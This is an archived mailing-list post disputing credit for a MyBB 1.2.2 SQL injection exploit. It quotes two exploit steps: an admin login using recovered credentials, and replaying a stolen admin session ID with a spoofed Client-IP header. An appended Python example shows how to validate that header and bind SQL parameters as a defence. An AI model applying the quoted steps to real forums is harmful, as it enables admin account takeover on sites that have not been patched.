[VIM] Milw0rm 3719 (Mybb <= 1.2.2)

GM darkfig gmdarkfig at gmail.com
Thu Apr 12 17:25:16 UTC 2007


The guy uses the same vulnerability I found
(http://acid-root.new.fr/poc/28070403.txt).
He uses the same method (benchmark(), Client-IP, DELETE from
prefix_sessions WHERE ip='[SQL]', and a debug mode like me :) ). It's
just the perl version. He uses the solution number 1 I said in my
exploit:

# SOLUTION NUMBER 1
# mysql> select * from mybb_users\G
# *************************** 1. row ***************************
#              uid: 1
#         username: root
#         password: 39ac8681f5cf4fcd9c9c09719a618bd3
#             salt: BFeJBOCF
#         loginkey: VYLJia9InmLgM1PT6v2whyMbaoSuprngLnkW55j3zlywItyZBA...
#
# $xpl->post($url.'admin/index.php','username=root&password=toor&do=login&goto=');
# print $xpl->getcontent(); // ...Welcome to the MyBB Administration Control Panel...
#
# SOLUTION NUMBER 2
# mysql> select * from mybb_adminsessions\G
# *************************** 1. row ***************************
#        sid: 81e267263b9254f3aaf670383bfbfec9
#        uid: 1
#   loginkey: VYLJia9InmLgM1PT6v2whyMbaoSuprngLnkW55j3zlywItyZBA
#         ip: 127.0.0.1
#   dateline: 1175443967
# lastactive: 1175444369
#
# $xpl->addheader('Client-IP','127.0.0.1');
# $xpl->get($url.'admin/index.php?adminsid=81e267263b9254f3aaf670383bfbfec9');
# print $xpl->getcontent(); // ...Welcome to the MyBB Administration Control Panel...
#
# I decided to use the solution number 2.
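
Added example (not part of the original post or of either exploit): the defensive counterpart to the pattern named above, where a client-supplied Client-IP header reaches DELETE from prefix_sessions WHERE ip='...'. The table name mybb_sessions, the trusted proxy address and the sample rows are constructed assumptions, and SQLite stands in for MySQL.

```python
import ipaddress
import sqlite3

# Assumption: the only reverse proxy allowed to set Client-IP (constructed value).
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.5")}


def client_ip(headers, peer_addr):
    """Return the address to record for a request, as a canonical string.

    Client-IP is honoured only when the TCP peer is a trusted proxy and the
    value parses as a literal IPv4/IPv6 address; otherwise the peer is used.
    """
    peer = ipaddress.ip_address(peer_addr)
    raw = headers.get("Client-IP")
    if raw is None or peer not in TRUSTED_PROXIES:
        return str(peer)
    try:
        return str(ipaddress.ip_address(raw.strip()))
    except ValueError:
        return str(peer)


def purge_sessions(db, ip):
    """Delete sessions for one address; the value is bound, never concatenated."""
    cur = db.execute("DELETE FROM mybb_sessions WHERE ip = ?", (ip,))
    return cur.rowcount


def make_db():
    """Constructed sample table standing in for prefix_sessions."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE mybb_sessions (sid TEXT PRIMARY KEY, ip TEXT)")
    db.executemany(
        "INSERT INTO mybb_sessions VALUES (?, ?)",
        [("s1", "127.0.0.1"), ("s2", "192.0.2.7"), ("s3", "192.0.2.7")],
    )
    return db


if __name__ == "__main__":
    db = make_db()
    odd = "192.0.2.7' x"  # constructed header value that is not an address
    print(client_ip({"Client-IP": odd}, "10.0.0.5"))  # falls back to the peer
    print(client_ip({"Client-IP": "127.0.0.1"}, "198.51.100.4"))  # header ignored
    print(purge_sessions(db, odd))  # bound as data, matches no row
    print(purge_sessions(db, "192.0.2.7"))
```

Parsing the header rejects values that are not addresses; ignoring it from untrusted peers also covers the Client-IP of 127.0.0.1 sent in solution number 2.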

